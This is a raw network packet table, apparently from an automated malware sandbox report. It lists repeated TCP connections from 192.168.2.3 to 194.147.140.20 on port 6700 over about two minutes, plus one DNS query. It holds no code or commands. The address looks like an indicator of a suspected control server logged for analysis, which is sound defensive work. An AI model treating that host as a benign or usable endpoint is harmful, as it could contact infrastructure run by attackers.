                            Sep 14, 2021 21:34:17.753101110 CEST497886700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:17.939471006 CEST670049788194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:17.976911068 CEST497886700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:18.220989943 CEST670049788194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:18.247700930 CEST497886700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:22.548379898 CEST497896700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:22.734529972 CEST670049789194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:22.734642029 CEST497896700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:22.755695105 CEST497896700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:22.953946114 CEST670049789194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:22.976515055 CEST497896700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:23.163249016 CEST670049789194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:23.215995073 CEST497896700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:23.408984900 CEST497896700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:23.658344030 CEST670049789194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:23.658467054 CEST497896700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:23.754518986 CEST670049789194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:23.809763908 CEST497896700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:23.844495058 CEST670049789194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:23.845310926 CEST497896700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:23.995959044 CEST670049789194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:24.045319080 CEST497896700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:24.097393036 CEST670049789194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:24.097532988 CEST497896700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:24.283807993 CEST670049789194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:24.325598955 CEST497896700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:24.389039040 CEST497896700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:24.511780977 CEST670049789194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:24.560390949 CEST497896700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:24.625859022 CEST670049789194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:24.746501923 CEST670049789194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:24.794303894 CEST497896700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:25.389853954 CEST497896700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:29.481136084 CEST497906700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:29.667884111 CEST670049790194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:29.668278933 CEST497906700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:29.689894915 CEST497906700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:29.888727903 CEST670049790194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:29.902503014 CEST497906700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:30.091331005 CEST670049790194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:30.130695105 CEST497906700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:30.378019094 CEST670049790194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:30.451612949 CEST497906700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:30.505742073 CEST670049790194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:30.560388088 CEST497906700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:30.637937069 CEST670049790194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:30.638221979 CEST497906700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:30.746331930 CEST670049790194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:30.794640064 CEST497906700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:30.877980947 CEST670049790194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:30.879159927 CEST497906700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:31.065589905 CEST670049790194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:31.110001087 CEST497906700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:31.223208904 CEST497906700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:31.296075106 CEST670049790194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:31.341696978 CEST497906700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:31.455816984 CEST670049790194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:31.456087112 CEST497906700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:31.690500021 CEST670049790194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:32.735774040 CEST497906700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:32.759561062 CEST670049790194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:32.759713888 CEST497906700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:37.786586046 CEST497916700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:37.975509882 CEST670049791194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:37.975699902 CEST497916700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:37.976438999 CEST497916700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:38.175510883 CEST670049791194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:38.175760984 CEST497916700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:38.424792051 CEST670049791194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:38.425774097 CEST497916700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:38.612394094 CEST670049791194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:38.615463018 CEST497916700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:38.862303019 CEST670049791194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:38.966967106 CEST670049791194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:38.987628937 CEST497916700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:39.173826933 CEST670049791194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:39.232923985 CEST497916700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:39.291682959 CEST497916700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:39.478647947 CEST670049791194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:39.486851931 CEST497916700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:39.674710035 CEST670049791194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:39.733331919 CEST497916700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:40.000272036 CEST497916700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:40.237584114 CEST670049791194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:40.769145012 CEST497916700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:40.867054939 CEST670049791194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:40.873200893 CEST497916700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:44.990398884 CEST497976700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:45.176496029 CEST670049797194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:45.176687956 CEST497976700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:45.177809000 CEST497976700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:45.373907089 CEST670049797194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:45.374016047 CEST497976700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:45.623079062 CEST670049797194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:45.623167992 CEST497976700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:45.810482979 CEST670049797194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:45.812185049 CEST497976700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:46.060677052 CEST670049797194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:46.174357891 CEST670049797194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:46.226000071 CEST497976700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:46.330029964 CEST497976700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:46.413954973 CEST670049797194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:46.414102077 CEST497976700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:46.600380898 CEST670049797194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:46.600475073 CEST497976700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:46.788614035 CEST670049797194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:46.835297108 CEST497976700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:47.021518946 CEST670049797194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:47.069663048 CEST497976700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:47.352092981 CEST497976700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:51.534621000 CEST498036700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:51.720648050 CEST670049803194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:51.720896959 CEST498036700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:51.864152908 CEST498036700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:52.061784983 CEST670049803194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:52.062068939 CEST498036700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:52.248493910 CEST670049803194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:52.251107931 CEST498036700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:52.498014927 CEST670049803194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:52.498157978 CEST498036700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:52.578711987 CEST670049803194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:52.632798910 CEST498036700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:52.684509039 CEST670049803194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:52.684638023 CEST498036700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:52.935451984 CEST670049803194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:52.935555935 CEST498036700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:53.123224974 CEST670049803194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:53.164180994 CEST498036700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:53.351429939 CEST670049803194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:53.383310080 CEST498036700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:53.622972965 CEST670049803194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:54.594578981 CEST498036700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:59.480269909 CEST498046700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:59.667222023 CEST670049804194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:59.668715000 CEST498046700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:59.686604023 CEST498046700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:34:59.884368896 CEST670049804194.147.140.20192.168.2.3
                            Sep 14, 2021 21:34:59.884763002 CEST498046700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:00.071770906 CEST670049804194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:00.099450111 CEST498046700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:00.344937086 CEST670049804194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:00.457921982 CEST670049804194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:00.508378029 CEST498046700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:00.694792032 CEST670049804194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:00.742796898 CEST498046700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:00.942713976 CEST498046700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:01.188632965 CEST670049804194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:01.188723087 CEST498046700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:01.375076056 CEST670049804194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:01.430578947 CEST498046700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:01.617001057 CEST670049804194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:01.664747953 CEST498046700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:01.973306894 CEST498046700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:02.219846964 CEST670049804194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:02.978838921 CEST498046700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:07.889096975 CEST498056700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:08.075711966 CEST670049805194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:08.075834990 CEST498056700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:08.153276920 CEST498056700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:08.351457119 CEST670049805194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:08.351602077 CEST498056700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:08.586776018 CEST670049805194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:08.586901903 CEST498056700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:08.773400068 CEST670049805194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:08.821566105 CEST498056700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:08.913726091 CEST498056700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:09.148467064 CEST670049805194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:09.184156895 CEST498056700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:09.260567904 CEST670049805194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:09.306042910 CEST498056700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:09.370388985 CEST670049805194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:09.370609999 CEST498056700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:09.617292881 CEST670049805194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:09.617444992 CEST498056700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:09.803865910 CEST670049805194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:09.852879047 CEST498056700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:10.039320946 CEST670049805194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:10.087523937 CEST498056700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:10.207108974 CEST498056700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:14.746592999 CEST498066700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:14.935580969 CEST670049806194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:14.935843945 CEST498066700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:14.936594963 CEST498066700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:15.139520884 CEST670049806194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:15.141038895 CEST498066700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:15.328567028 CEST670049806194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:15.328804970 CEST498066700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:15.586757898 CEST670049806194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:15.586901903 CEST498066700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:15.820278883 CEST670049806194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:15.947948933 CEST670049806194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:15.949354887 CEST498066700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:16.135576963 CEST670049806194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:16.137037039 CEST498066700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:16.323497057 CEST670049806194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:16.323698044 CEST498066700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:16.511478901 CEST670049806194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:16.511595964 CEST498066700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:16.764518976 CEST670049806194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:17.516508102 CEST498066700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:21.936362028 CEST498076700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:22.122423887 CEST670049807194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:22.122584105 CEST498076700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:22.145704985 CEST498076700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:22.340934038 CEST670049807194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:22.341306925 CEST498076700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:22.527628899 CEST670049807194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:22.527868986 CEST498076700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:22.759243011 CEST670049807194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:22.759524107 CEST498076700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:23.007726908 CEST670049807194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:23.166929960 CEST670049807194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:23.168075085 CEST498076700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:23.354042053 CEST670049807194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:23.400887966 CEST498076700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:23.475353003 CEST498076700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:23.664918900 CEST670049807194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:23.665036917 CEST498076700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:23.851819992 CEST670049807194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:23.900989056 CEST498076700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:24.479887962 CEST498076700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:28.565654993 CEST498086700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:28.753206968 CEST670049808194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:28.753391981 CEST498086700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:28.771632910 CEST498086700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:28.968015909 CEST670049808194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:28.980369091 CEST498086700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:29.167260885 CEST670049808194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:29.199163914 CEST498086700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:29.448446989 CEST670049808194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:29.568130016 CEST498086700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:29.591535091 CEST670049808194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:29.635906935 CEST498086700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:29.754381895 CEST670049808194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:29.756983995 CEST498086700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:29.995261908 CEST670049808194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:29.995464087 CEST498086700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:30.182770014 CEST670049808194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:30.229577065 CEST498086700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:30.422297955 CEST670049808194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:30.484607935 CEST498086700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:30.597213030 CEST498086700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:34.682358980 CEST498096700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:34.869028091 CEST670049809194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:34.869148016 CEST498096700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:34.870076895 CEST498096700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:35.067806959 CEST670049809194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:35.068150043 CEST498096700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:35.254755020 CEST670049809194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:35.278090000 CEST498096700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:35.510557890 CEST670049809194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:35.510672092 CEST498096700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:35.654047012 CEST670049809194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:35.698446989 CEST670049809194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:35.698811054 CEST498096700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:35.948390007 CEST670049809194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:35.948599100 CEST498096700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:36.134702921 CEST670049809194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:36.183360100 CEST498096700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:36.371511936 CEST670049809194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:36.418549061 CEST498096700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:36.481302023 CEST498096700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:36.731388092 CEST670049809194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:37.498122931 CEST498096700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:41.600889921 CEST498106700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:41.787954092 CEST670049810194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:41.788172007 CEST498106700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:41.789172888 CEST498106700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:41.989973068 CEST670049810194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:41.990945101 CEST498106700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:42.181360960 CEST670049810194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:42.188258886 CEST498106700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:42.432611942 CEST670049810194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:42.544725895 CEST498106700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:42.560946941 CEST670049810194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:42.605750084 CEST498106700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:42.731101036 CEST670049810194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:42.732464075 CEST498106700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:42.979377985 CEST670049810194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:42.979604959 CEST498106700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:43.165930033 CEST670049810194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:43.215245962 CEST498106700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:43.421128035 CEST670049810194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:43.466330051 CEST498106700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:43.559578896 CEST498106700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:47.645201921 CEST498116700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:47.832695961 CEST670049811194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:47.835663080 CEST498116700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:47.850291967 CEST498116700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:48.046880960 CEST670049811194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:48.047297955 CEST498116700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:48.233784914 CEST670049811194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:48.235060930 CEST498116700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:48.474536896 CEST670049811194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:48.586517096 CEST670049811194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:48.587479115 CEST498116700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:48.773420095 CEST670049811194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:48.773626089 CEST498116700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:49.022718906 CEST670049811194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:49.022888899 CEST498116700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:49.208986998 CEST670049811194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:49.262461901 CEST498116700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:49.452792883 CEST670049811194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:49.496896029 CEST498116700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:49.608025074 CEST498116700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:49.849559069 CEST670049811194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:50.638199091 CEST498116700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:54.736246109 CEST498126700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:54.922261953 CEST670049812194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:54.923444986 CEST498126700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:54.923974037 CEST498126700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:55.110407114 CEST670049812194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:55.153666019 CEST498126700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:55.341717005 CEST670049812194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:55.342112064 CEST498126700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:55.529115915 CEST670049812194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:55.530563116 CEST498126700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:55.670224905 CEST498126700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:55.782246113 CEST670049812194.147.140.20192.168.2.3
                            Sep 14, 2021 21:35:55.782428026 CEST498126700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:35:59.876744986 CEST498136700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:36:00.062983990 CEST670049813194.147.140.20192.168.2.3
                            Sep 14, 2021 21:36:00.063100100 CEST498136700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:36:00.063833952 CEST498136700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:36:00.260679007 CEST670049813194.147.140.20192.168.2.3
                            Sep 14, 2021 21:36:00.261076927 CEST498136700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:36:00.447824001 CEST670049813194.147.140.20192.168.2.3
                            Sep 14, 2021 21:36:00.449461937 CEST498136700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:36:00.692620039 CEST670049813194.147.140.20192.168.2.3
                            Sep 14, 2021 21:36:00.733247042 CEST498136700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:36:00.821402073 CEST670049813194.147.140.20192.168.2.3
                            Sep 14, 2021 21:36:00.872878075 CEST498136700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:36:00.921941996 CEST670049813194.147.140.20192.168.2.3
                            Sep 14, 2021 21:36:00.923192024 CEST498136700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:36:01.061175108 CEST670049813194.147.140.20192.168.2.3
                            Sep 14, 2021 21:36:01.107263088 CEST498136700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:36:01.161189079 CEST670049813194.147.140.20192.168.2.3
                            Sep 14, 2021 21:36:01.162101030 CEST498136700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:36:01.351111889 CEST670049813194.147.140.20192.168.2.3
                            Sep 14, 2021 21:36:01.404138088 CEST498136700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:36:01.591516972 CEST670049813194.147.140.20192.168.2.3
                            Sep 14, 2021 21:36:01.639559031 CEST498136700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:36:02.040328026 CEST670049813194.147.140.20192.168.2.3
                            Sep 14, 2021 21:36:02.091711044 CEST498136700192.168.2.3194.147.140.20
                            Sep 14, 2021 21:36:05.286523104 CEST670049813194.147.140.20192.168.2.3
                            Sep 14, 2021 21:36:05.341969013 CEST498136700192.168.2.3194.147.140.20

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 14, 2021 21:31:51.052555084 CEST4919953192.168.2.38.8.8.8
                            Sep 14, 2021 21:31:51.081182957 CEST53491998.8.8.8192.168.2.3
